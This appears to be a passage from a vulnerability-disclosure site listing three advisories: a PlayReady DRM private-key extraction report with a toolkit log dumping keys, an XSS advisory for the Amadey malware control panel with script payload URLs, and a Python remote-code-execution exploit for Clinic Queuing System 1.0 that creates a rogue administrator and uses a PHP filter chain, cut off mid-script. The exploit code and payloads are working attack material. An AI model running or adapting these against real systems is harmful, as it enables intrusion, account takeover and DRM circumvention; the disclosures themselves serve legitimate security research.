The Security Explorations team has come up with two attack scenarios that make it possible to extract private ECC keys used by a PlayReady client (Windows SW DRM scenario) for the communication with a license server and identity purposes. Proof of concept included.

    Hello All,We have come up with two attack scenarios that make it possible toextract private ECC keys used by a PlayReady client (Windows SW DRMscenario) for the communication with a license server and identitypurposes.More specifically, we successfully demonstrated the extraction of thefollowing keys:- private signing key used to digitally sign license requests issuedby PlayReady client,- private encryption key used to decrypt license responses received bythe client (decrypt license blobs carrying encrypted content keys).A proof for the above (which Microsoft should be able to confirm) isavailable at this link:https://security-explorations.com/samples/wbpmp_id_compromise_proof.txtWhile PlayReady security is primary about security of content keys,ECC keys that make up client identity are even more important. Uponcompromise, these keys can be used to mimic a PlayReady client outsideof a Protected Media Path environment and regardless of the imposedsecurity restrictions.In that context, extraction of ECC keys used as part of a PlayReadyclient identity constitute an ultimate compromise of a PlayReadyclient on Windows ("escape" of the PMP environment, ability to requestlicenses and decrypt content keys).Content key extraction from Protected Media Path process (through XORkey or white-box crypto data structures) in a combination with thislatest identity compromise attack means that there is nothing left tobreak when it comes to Windows SW DRM implementation.Let this serve as a reminder that PlayReady content protectionimplemented in software and on a client side has little chances of a“survival” (understood as a state of not being successfully reverseengineered and compromised). In that context, this is vendor’sresponsibility to constantly increase the bar and with the use of allavailable technological means.Thank you.Best Regards,Adam Gowdiak----------------------------------Security Explorations -AG Security Research Labhttps://security-explorations.com----------------------------------Packet Storm Editor Note - below is wbpmp_id_compromise_proof.txtc:\_MNT\PROJECTS\WBPMP\code\toolkit>shell# MS Play Ready / Canal+ VOD toolkit# (c) Security Explorations    2016-2019 Poland# (c) AG Security Research     2019-2022 Polandloaded cdn      [CDN helper]loaded mspr     [MS Play Ready toolkit]loaded vod      [CANALP VOD toolkit]loaded cgaweb   [CANALP CGAWeb toolkit]msprcp> set CDM_DIR cdm\w10msprcp> identity0C86330B0E98CD7C586F336088DAFA0E4F72F3CBDC81C849F635AE556A73679F902B255736B6E891F3AF30F98B0A5DBAD9A5C7A90F8DEA029AA8FB1C95887BE3E82DFAE7A9DB21FC1ECF33C1DADC54B7msprcp> identity 0C86330B0E98CD7C586F336088DAFA0E -v[0C86330B0E98CD7C586F336088DAFA0E]PRKF version: 3   attr: 100c Unknown   data     0000:  00 04 00 00                                      ....   attr: 1000 Unknown   data     0000:  00 01 10 01 00 00 00 2c 00 02 00 80 00 01 00 00  .......,........     0010:  ea 3c 67 da 4e 43 de e0 00 00 00 10 30 e1 4c db  .<g.NC......0.L.     0020:  9d 23 9e 97 f7 1d ac 03 13 c2 2b 69 00 01 10 02  .#........+i....     0030:  00 00 00 7c 00 01 01 00 00 00 00 40 cb 27 6f 9f  ...|.......@.'o.     0040:  9f 76 46 64 54 23 19 ef 9c c7 69 0f 9c 3b e3 75  .vFdT#....i..;.u     0050:  8b d3 78 2a 8d 03 fb a8 bf 9e 1c 6d f7 10 1c 69  ..x*.......m...i     0060:  94 2c 4d 07 d9 68 8b 61 09 85 bb d3 4e e8 58 20  .,M..h.a....N.X.     0070:  e2 0c c9 bc a9 a8 1e b7 f6 59 65 7d 00 62 e4 7a  .........Ye}.b.z     0080:  4a 93 87 21 00 00 00 20 93 de eb 4b ab b4 b2 c1  J..!.......K....     0090:  71 9b 3c fc cf a8 b9 7e f2 a9 4f e1 07 39 17 fd  q.<.......O..9..     00a0:  23 10 72 8a 29 95 bf d8 00 01 10 11 00 00 00 3c  #.r.)..........<     00b0:  00 02 00 80 2d 82 c1 90 50 2c e7 55 00 00 00 10  ....-...P,.U....     00c0:  8f 03 13 45 06 c3 b4 3e fb 7f 1d 77 e8 ca 2d 07  ...E...>...w..-.     00d0:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................     00e0:  00 00 00 00                                      ....   attr: 1009 Identities     IdentityInfo       pubkey         0000:  f0 34 a0 f4 28 79 dc a4 73 88 c8 fa a6 46 40 94  .4..(y..s....F@.         0010:  ef 10 f7 4b f4 42 5e 2e 51 c1 08 67 9d 9a 4b 2e  ...K.B^.Q..g..K.         0020:  af 2b ed 89 8e dd bb eb 1b ad 68 df 9c 33 d2 8b  .+........h..3..         0030:  1d f3 a5 77 1a d2 a0 a3 b9 4d 83 6d 24 a4 2a 03  ...w.....M.m$.*.       prvkey         0000:  31 d5 b7 ab dd 28 44 52 3b 8a ac 6c e2 c5 4e 34  1....(DR;..l..N4         0010:  61 1d 97 8f e1 4f 63 e9 c0 14 8a 83 6c 5f 3f cc  a....Oc.....l_?.     IdentityInfo       pubkey         0000:  42 b2 a0 ff 38 1c 34 cc 67 06 3b 50 e1 2e 0d de  B...8.4.g.;P....         0010:  74 49 55 29 38 ef 66 0c 60 5c 90 9f 8c b0 49 43  tIU)8.f.......IC         0020:  0f e7 a8 1f 2f 67 5a b2 90 5c 3e 2e 99 62 19 b4  ..../gZ...>..b..         0030:  4a 39 8b 23 64 5e 4c d7 cc 95 38 bd 3c d3 2b f7  J9.#d^L...8.<.+.       prvkey         0000:  d7 60 5c 71 57 a0 01 7c 58 e2 e7 79 a8 b1 12 55  ...qW..|X..y...U         0010:  1d 72 14 f0 d9 2c ef 04 6c cc 57 c1 2e 9b e3 b4  .r...,..l.W.....     IdentityInfo       pubkey         0000:  cb 27 6f 9f 9f 76 46 64 54 23 19 ef 9c c7 69 0f  .'o..vFdT#....i.         0010:  9c 3b e3 75 8b d3 78 2a 8d 03 fb a8 bf 9e 1c 6d  .;.u..x*.......m         0020:  f7 10 1c 69 94 2c 4d 07 d9 68 8b 61 09 85 bb d3  ...i.,M..h.a....         0030:  4e e8 58 20 e2 0c c9 bc a9 a8 1e b7 f6 59 65 7d  N.X..........Ye}       prvkey         0000:  4c 33 c6 8e 0e f1 b6 f1 0c d5 31 6b 40 94 aa 68  L3........1k@..h         0010:  32 cc 68 1b 00 3b fc 65 8b c4 3c e3 cb 62 de fc  2.h..;.e..<..b..         0020:  11 ef 51 7b 92 73 a1 84 24 ac 71 33 cf 76 d3 05  ..Q{.s..$.q3.v..         0030:  44 2d 4e 12 79 3f 3f 09 7a 4e 4d 51 ac 78 a7 3c  D-N.y??.zNMQ.x.<         0040:  6b                                               k   IdentityCertChain     CERT CHAIN:       ### CERT         - random           0000:  07 80 59 24 9a b6 7e 48 c3 7f 6d 38 30 af f0 b6  ..Y$...H..m80...         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  42 b2 a0 ff 38 1c 34 cc 67 06 3b 50 e1 2e 0d de  B...8.4.g.;P....           0010:  74 49 55 29 38 ef 66 0c 60 5c 90 9f 8c b0 49 43  tIU)8.f.......IC           0020:  0f e7 a8 1f 2f 67 5a b2 90 5c 3e 2e 99 62 19 b4  ..../gZ...>..b..           0030:  4a 39 8b 23 64 5e 4c d7 cc 95 38 bd 3c d3 2b f7  J9.#d^L...8.<.+.         - pubkey_enc           0000:  cb 27 6f 9f 9f 76 46 64 54 23 19 ef 9c c7 69 0f  .'o..vFdT#....i.           0010:  9c 3b e3 75 8b d3 78 2a 8d 03 fb a8 bf 9e 1c 6d  .;.u..x*.......m           0020:  f7 10 1c 69 94 2c 4d 07 d9 68 8b 61 09 85 bb d3  ...i.,M..h.a....           0030:  4e e8 58 20 e2 0c c9 bc a9 a8 1e b7 f6 59 65 7d  N.X..........Ye}         - digest           0000:  c5 c4 33 e5 4e b0 c5 b3 5b e9 89 9b de 89 b4 cd  ..3.N...[.......           0010:  e5 e1 c3 bb 80 c3 88 87 17 40 95 0b 3a 82 cc 89  .........@..:...         - signature           0000:  23 ce 2a 20 50 24 8f 32 3d 5a 08 5c 88 dd 65 dd  #.*.P$.2=Z....e.           0010:  93 66 be ec 7a d5 c6 39 80 66 c1 f5 36 4e b7 08  .f..z..9.f..6N..           0020:  9d 7b 59 05 79 3b 49 08 4f 94 af 7f b8 96 4e 81  .{Y.y;I.O.....N.           0030:  bd ff fe 38 61 d8 08 90 96 2c b6 32 ee ba 75 5f  ...8a....,.2..u_         - signkey           0000:  59 86 b7 a2 a9 d6 b3 06 1f 5d 20 08 f6 97 ee f5  Y........]......           0010:  bc c6 15 cb e6 4e f9 60 7a 83 55 3d c0 3a 21 b6  .....N..z.U=.:!.           0020:  d4 c7 33 e2 71 7e 1c ad 00 e5 20 70 87 64 66 9e  ..3.q......p.df.           0030:  ee 5f 4d 78 b1 c6 42 3a f9 6f af 6a 44 cf ef 3d  ._Mx..B:.o.jD..=         - sig status: BAD SIGNATURE       ### CERT         - names           * Microsoft           * Windows           * 6.4.9.000         - random           0000:  28 37 b2 3d a4 70 a4 7f f0 8c 69 78 3c 6c 38 cd  (7.=.p....ix<l8.         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  59 86 b7 a2 a9 d6 b3 06 1f 5d 20 08 f6 97 ee f5  Y........]......           0010:  bc c6 15 cb e6 4e f9 60 7a 83 55 3d c0 3a 21 b6  .....N..z.U=.:!.           0020:  d4 c7 33 e2 71 7e 1c ad 00 e5 20 70 87 64 66 9e  ..3.q......p.df.           0030:  ee 5f 4d 78 b1 c6 42 3a f9 6f af 6a 44 cf ef 3d  ._Mx..B:.o.jD..=         - digest           0000:  68 d5 b6 78 9c 6c c4 63 36 50 62 4a cc 20 c0 08  h..x.l.c6PbJ....           0010:  16 1b 0a e9 31 0c 68 97 dc eb 1a 41 1b df 6b 75  ....1.h....A..ku         - signature           0000:  c2 a3 13 ec e8 a9 f0 77 70 df 3d 8b 2b ed 08 68  .......wp.=.+..h           0010:  b0 79 c9 d2 40 84 26 a9 1d 16 00 4a 73 76 81 c7  .y..@.&....Jsv..           0020:  aa 1f 75 78 6d 17 20 6e 15 e1 8f 2d 39 c8 db 05  ..uxm..n...-9...           0030:  00 0d b5 6f 88 27 04 ed a4 8f 24 7f c7 f7 da b4  ...o.'....$.....         - signkey           0000:  e7 3a 1b a7 c0 65 9e 6d 2f 45 5c 9d 80 91 cc da  .:...e.m/E......           0010:  96 c9 63 6b 4f 63 a1 78 18 f5 54 e4 bd 19 97 14  ..ckOc.x..T.....           0020:  81 07 fe d9 8a bf 0e 6b 8e 96 81 58 e6 90 7c a7  .......k...X..|.           0030:  df 1d 66 cf a3 58 f7 7b 1c 4e 62 d0 28 11 56 9c  ..f..X.{.Nb.(.V.         - sig status: OK       ### CERT         - names           * Microsoft           * PlayReady SL2000 Device Port- Windows Lib Codebase Version CA           * 1.0.0.4         - random           0000:  db 51 85 24 63 ac 07 0b aa c9 91 f9 c4 0a 07 2a  .Q.$c..........*         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  e7 3a 1b a7 c0 65 9e 6d 2f 45 5c 9d 80 91 cc da  .:...e.m/E......           0010:  96 c9 63 6b 4f 63 a1 78 18 f5 54 e4 bd 19 97 14  ..ckOc.x..T.....           0020:  81 07 fe d9 8a bf 0e 6b 8e 96 81 58 e6 90 7c a7  .......k...X..|.           0030:  df 1d 66 cf a3 58 f7 7b 1c 4e 62 d0 28 11 56 9c  ..f..X.{.Nb.(.V.         - digest           0000:  63 70 b4 92 33 b1 cf 78 7f 9e 36 01 29 e0 29 b2  cp..3..x..6.).).           0010:  f7 cf b1 cc 0b 71 5d 6a 02 24 df 01 75 d2 2f 0e  .....q]j.$..u./.         - signature           0000:  99 f3 5b 4b 55 a8 8d a8 bd 18 db 94 8e b0 31 1f  ..[KU.........1.           0010:  14 a4 43 41 64 f7 fd 81 cd 1e 57 68 0e f1 2c 40  ..CAd.....Wh..,@           0020:  c4 c2 19 20 78 37 41 07 c1 e3 54 ec fb 64 19 18  ....x7A...T..d..           0030:  13 5b 2c 5a 34 7f 1f 48 7a 88 5a 02 33 e5 b9 76  .[,Z4..Hz.Z.3..v         - signkey           0000:  7d 91 d4 6d 44 f0 29 2a bd b9 72 d7 9b dc bc f8  }..mD.)*..r.....           0010:  35 ad 17 27 cb c8 35 37 7e 91 43 58 44 f9 1b 3f  5..'..57..CXD..?           0020:  71 be 7c 6b 04 0d bf d4 f7 80 8b 7a 0c 47 f7 82  q.|k.......z.G..           0030:  30 2b 9c 29 5f 05 eb c3 92 71 f5 47 88 41 fd 1b  0+.)_....q.G.A..         - sig status: OK       ### CERT         - names           * Microsoft           * PlayReady SL2000 Device Port - Windows Platform CA for x86/amd64           * 1.0.0.3         - random           0000:  4a ee c4 a0 0d c9 57 ab 14 52 de 28 54 42 f3 84  J.....W..R.(TB..         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  7d 91 d4 6d 44 f0 29 2a bd b9 72 d7 9b dc bc f8  }..mD.)*..r.....           0010:  35 ad 17 27 cb c8 35 37 7e 91 43 58 44 f9 1b 3f  5..'..57..CXD..?           0020:  71 be 7c 6b 04 0d bf d4 f7 80 8b 7a 0c 47 f7 82  q.|k.......z.G..           0030:  30 2b 9c 29 5f 05 eb c3 92 71 f5 47 88 41 fd 1b  0+.)_....q.G.A..         - digest           0000:  2f ad a9 0e 8f 7e 82 47 7a 2e 82 c3 6d 0c 20 c7  /......Gz...m...           0010:  0b 58 95 d7 2e 85 21 28 83 b1 9c 27 0b 49 dc 21  .X....!(...'.I.!         - signature           0000:  9e fb bf 14 68 cc 5e 0f db 21 7d 11 dc 67 4a 23  ....h.^..!}..gJ#           0010:  71 c7 ac 34 73 bb 48 ee a3 33 c3 c9 55 62 2e c2  q..4s.H..3..Ub..           0020:  bb 36 01 af cd dc 88 48 01 fa d2 2b 4b 3f e3 75  .6.....H...+K?.u           0030:  48 44 98 40 9d db 53 0f 44 25 a5 65 fd 29 61 7e  HD.@..S.D%.e.)a.         - signkey           0000:  a1 87 e3 42 5c 05 f7 a4 52 85 d6 fe c8 17 f7 3b  ...B....R......;           0010:  69 64 74 e2 b9 e1 61 4b a3 fa 51 b9 ad fe 9d 27  idt...aK..Q....'           0020:  3f 6a 4e 50 75 e0 1d f2 ab 18 61 e7 c2 e1 9b d2  ?jNPu.....a.....           0030:  87 99 86 8f 97 f7 cb a2 1d 97 73 19 ba b8 be 92  ..........s.....         - sig status: OK       ### CERT         - names           * Microsoft           * PlayReady SL2000 Device Port + Link CA           * 1.0.0.1         - random           0000:  ec aa b6 cd 0b 16 ca df e9 a8 82 52 b4 58 9c a9  ...........R.X..         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  a1 87 e3 42 5c 05 f7 a4 52 85 d6 fe c8 17 f7 3b  ...B....R......;           0010:  69 64 74 e2 b9 e1 61 4b a3 fa 51 b9 ad fe 9d 27  idt...aK..Q....'           0020:  3f 6a 4e 50 75 e0 1d f2 ab 18 61 e7 c2 e1 9b d2  ?jNPu.....a.....           0030:  87 99 86 8f 97 f7 cb a2 1d 97 73 19 ba b8 be 92  ..........s.....         - digest           0000:  ed 0f 33 d6 b4 ab f0 8d c0 1a 47 1f d0 13 68 0e  ..3.......G...h.           0010:  0c 12 e3 a9 ce d3 00 f9 9b 45 af 61 f1 68 4d 64  .........E.a.hMd         - signature           0000:  31 60 bc 8c 1f 0e 5e fe ea 80 83 79 b4 ad 02 74  1.....^....y...t           0010:  f1 c9 20 f9 c8 93 f0 ca 5c c7 72 e6 5c 97 8e 88  ..........r.....           0020:  a8 9f c5 b0 7b b6 d0 8f 50 33 20 fa 34 03 4a ea  ....{...P3..4.J.           0030:  68 91 01 d2 f0 cb 0f fa 4d 51 5c 25 93 c8 c2 12  h.......MQ.%....         - signkey           0000:  86 4d 61 cf f2 25 6e 42 2c 56 8b 3c 28 00 1c fb  .Ma..%nB,V.<(...           0010:  3e 15 27 65 85 84 ba 05 21 b7 9b 18 28 d9 36 de  >.'e....!...(.6.           0020:  1d 82 6a 8f c3 e6 e7 fa 7a 90 d5 ca 29 46 f1 f6  ..j.....z...)F..           0030:  4a 2e fb 9f 5d cf fe 7e 43 4e b4 42 93 fa c5 ab  J...]...CN.B....         - sig status: OK   attr: 1010 Unknown   data     0000:  00 02 00 80 2d 82 c1 90 50 2c e7 55 00 00 00 10  ....-...P,.U....     0010:  9e 53 d0 8b 82 43 90 08 bb f4 25 2d 06 1d 79 0e  .S...C....%-..y.     0020:  b1 ff 09 8d 5a 7c 52 4d ae 22 40 b0 5e c8 4d 33  ....Z|RM."@.^.M3     0030:  00 05 00 00                                      ....   attr: 1013 Unknown   data     0000:  00 00 00 01 00 00 00 10 30 b3 3e b8 a1 31 ae 42  ........0.>..1.B     0010:  ab 0d 43 74 c5 15 cd e0                          ..Ct....   attr: 1014 Unknown   data     0000:  19 ec 66 7f 93 64 89 46 95 47 89 1d a5 37 12 f1  ..f..d.F.G...7..   SignerCertChain     CERT CHAIN:       ### CERT         - names           * Microsoft           * Microsoft KeyFileSigner           * 1.0.0.1         - random           0000:  f0 6a b7 09 88 a4 c7 c8 1d f9 5c 6d cd e4 ab 52  .j.........m...R         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  97 41 fa 59 bd 5e b8 22 80 b2 a9 e2 dd e5 70 87  .A.Y.^."......p.           0010:  ce 91 07 e4 3b 12 81 69 fb a9 94 48 37 f4 9e 46  ....;..i...H7..F           0020:  bb b7 11 b9 8f 4e c8 17 96 50 9d 05 f5 98 f7 a7  .....N...P......           0030:  5c 44 56 2d 4d 2a c3 4d 48 1a c7 4a 1d 48 16 c4  .DV-M*.MH..J.H..         - digest           0000:  b9 e0 29 a8 59 21 9c de c1 b5 75 58 4c e6 6d e3  ..).Y!....uXL.m.           0010:  08 8c 3e 43 05 14 26 fa 8d c0 3e a5 df f3 df bc  ..>C..&...>.....         - signature           0000:  c8 b0 b2 4d 59 da e8 2b a5 b1 ac 61 95 54 85 ea  ...MY..+...a.T..           0010:  32 a1 19 5f 45 9c 0d 54 a0 cf 43 86 54 64 41 c0  2.._E..T..C.TdA.           0020:  8a 02 e7 0d e1 49 aa 40 26 61 a9 e0 b8 77 d9 ac  .....I.@&a...w..           0030:  1e 2d 3f 2c 7f 7c 29 82 74 c3 74 f9 11 5d f0 81  .-?,.|).t.t..]..         - signkey           0000:  af 6f af 3a 41 e4 a2 b9 eb cd 8c 95 a5 05 9b 11  .o.:A...........           0010:  38 a3 97 2a 1e c0 72 e3 24 52 78 b9 b5 49 28 f3  8..*..r.$Rx..I(.           0020:  e0 28 3e 78 51 5d eb 6f 56 93 1a 5a 28 f3 aa b3  .(>xQ].oV..Z(...           0030:  04 c7 1f b5 b4 c7 f4 92 59 ed 21 f8 65 14 ec 33  ........Y.!.e..3         - sig status: OK       ### CERT         - names           * Microsoft           * PlayReady SL2000 KeyFileSigner Root CA           * 1.0.0.1         - random           0000:  d6 ac 35 b4 d8 5d b4 30 74 0c ac 05 ea 0c 1e 86  ..5..].0t.......         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  af 6f af 3a 41 e4 a2 b9 eb cd 8c 95 a5 05 9b 11  .o.:A...........           0010:  38 a3 97 2a 1e c0 72 e3 24 52 78 b9 b5 49 28 f3  8..*..r.$Rx..I(.           0020:  e0 28 3e 78 51 5d eb 6f 56 93 1a 5a 28 f3 aa b3  .(>xQ].oV..Z(...           0030:  04 c7 1f b5 b4 c7 f4 92 59 ed 21 f8 65 14 ec 33  ........Y.!.e..3         - digest           0000:  71 01 a1 dd 80 f2 79 7a 2e 3c f2 f6 b9 bf 78 b0  q.....yz.<....x.           0010:  ed 65 93 d5 42 cf 17 d4 0a c7 fa b0 18 82 3b 2f  .e..B.........;/         - signature           0000:  af 18 1d 1a 7d 98 92 c5 df 3e ac b3 2a 17 d2 29  ....}....>..*..)           0010:  92 e9 7f 4c 0f b1 5a 3d bd 91 d9 e2 bb b9 34 87  ...L..Z=......4.           0020:  e7 9b 00 bb 78 02 1f 5c a8 e0 f2 e0 0b d3 f9 b5  ....x...........           0030:  1a c5 e6 fe dd cd b4 1c 3f d7 89 d1 62 6a 5a 0b  ........?...bjZ.         - signkey           0000:  86 4d 61 cf f2 25 6e 42 2c 56 8b 3c 28 00 1c fb  .Ma..%nB,V.<(...           0010:  3e 15 27 65 85 84 ba 05 21 b7 9b 18 28 d9 36 de  >.'e....!...(.6.           0020:  1d 82 6a 8f c3 e6 e7 fa 7a 90 d5 ca 29 46 f1 f6  ..j.....z...)F..           0030:  4a 2e fb 9f 5d cf fe 7e 43 4e b4 42 93 fa c5 ab  J...]...CN.B....         - sig status: OKmsprcp> identity 0C86330B0E98CD7C586F336088DAFA0E -e 0C86330B0E98CD7C586F336088DAFA0E0C86330B0E98CD7C586F336088DAFA0E.enc.pub (public encryption key)0C86330B0E98CD7C586F336088DAFA0E.enc.prv (private encryption key)0C86330B0E98CD7C586F336088DAFA0E.sig.pub (public signing key)0C86330B0E98CD7C586F336088DAFA0E.sig.prv (private signing key)msprcp> checkkeypair 0C86330B0E98CD7C586F336088DAFA0E.enc.prv.plain 0C86330B0E98CD7C586F336088DAFA0E.enc.pubKEY CHECK:- prv: 7704db9c130887d60a2c61b1891bbad64676ba56fe146fc6ecc2be993c1cb53d- pub:  X: cb276f9f9f764664542319ef9cc7690f9c3be3758bd3782a8d03fba8bf9e1c6d  Y: f7101c69942c4d07d9688b610985bbd34ee85820e20cc9bca9a81eb7f659657dKEY CHECK OKmsprcp>

Microsoft PlayReady Complete Client Identity Compromise

Panel Amadey.d.c malware suffers from cross site scripting vulnerabilities.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/50467c891bf7de34d2d65fa93ab8b558.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel Amadey.d.cVulnerability: Cross Site Scripting (XSS)Family: AmadeyType: Web PanelMD5: 50467c891bf7de34d2d65fa93ab8b558 (Login.php)SHA256: 65623eead2bcba66817861246e842386d712c38c5c5558e50eb49cffa2a1035dVuln ID: MVID-2024-0680Disclosure: 05/09/2024Description: The Amadey C2 web panel is written in PHP for remote administration capability. The Login.php webpage accepts HTTP GET "l" and "p" parameters which are passed to the backend server side code: $_GET["l"]  name=\"login\",  $_GET["p"] , name=\"password\". However, there is no secure coding practice of filtering input or sanitization of output. Panel users who visit a third-party attacker website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the Amadey web interface.The submit button contains the text "Unlock".Entering incorrect password results in URI of "?wrong=1" and displays "Wrong login or password", after a few seconds delay redirects back to Login.php.http://127.0.0.1/Panel.Amadey.d.c/Login.php?wrong=1Wrong login or passwordThe web panel HTML source code for the URL "Login.php?wrong=1" contains the letters "CC" plus the Domain/IP within brackets[x.x.x.x] within the HTML title tag. %3Ctitle%3E CC [127.0.0.1] %3C/title%3ETested successfully in Firefox.Exploit/PoC:Vulnerable parameters: "l" and "p"http://x.x.x.x/Panel.Amadey.d.c/Login.php?l=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ehttp://x.x.x.x/Panel.Amadey.d.c/Login.php?p=%22/%3E%3Cscript%3Ealert(666)%3C/script%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel Amadey.d.c MVID-2024-0680 Cross Site Scripting

Clinic Queuing System version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Clinic Queuing System 1.0 RCE # Date: 2024/1/7# Exploit Author: Juan Marco Sanchez# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html# Version: 1.0# Tested on: Debian Linux Apache Web Server# CVE: CVE-2024-0264 and CVE-2024-0265import requestsimport randomimport argparsefrom bs4 import BeautifulSoupparser = argparse.ArgumentParser()parser.add_argument("target")args = parser.parse_args()base_url = args.targetphase1_url = base_url + '/LoginRegistration.php?a=save_user'phase2_url = base_url + '/LoginRegistration.php?a=login'filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home"def phase1(): # CVE-2024-0264  rand_user = 'pwn_'+str(random.randint(100, 313))  rand_pass = 'pwn_'+str(random.randint(100, 313))  pwn_user_data = {'formToken':'','fullname':'pwn!','username':rand_user,'password':rand_pass,'status':1,'type':1}  print("[*] adding administrator " + rand_user + ":" + rand_pass)  phase1 = requests.post(phase1_url, pwn_user_data)  if "User Account has been added successfully." in phase1.text:    print("[+] Phase 1 Success - Admin user 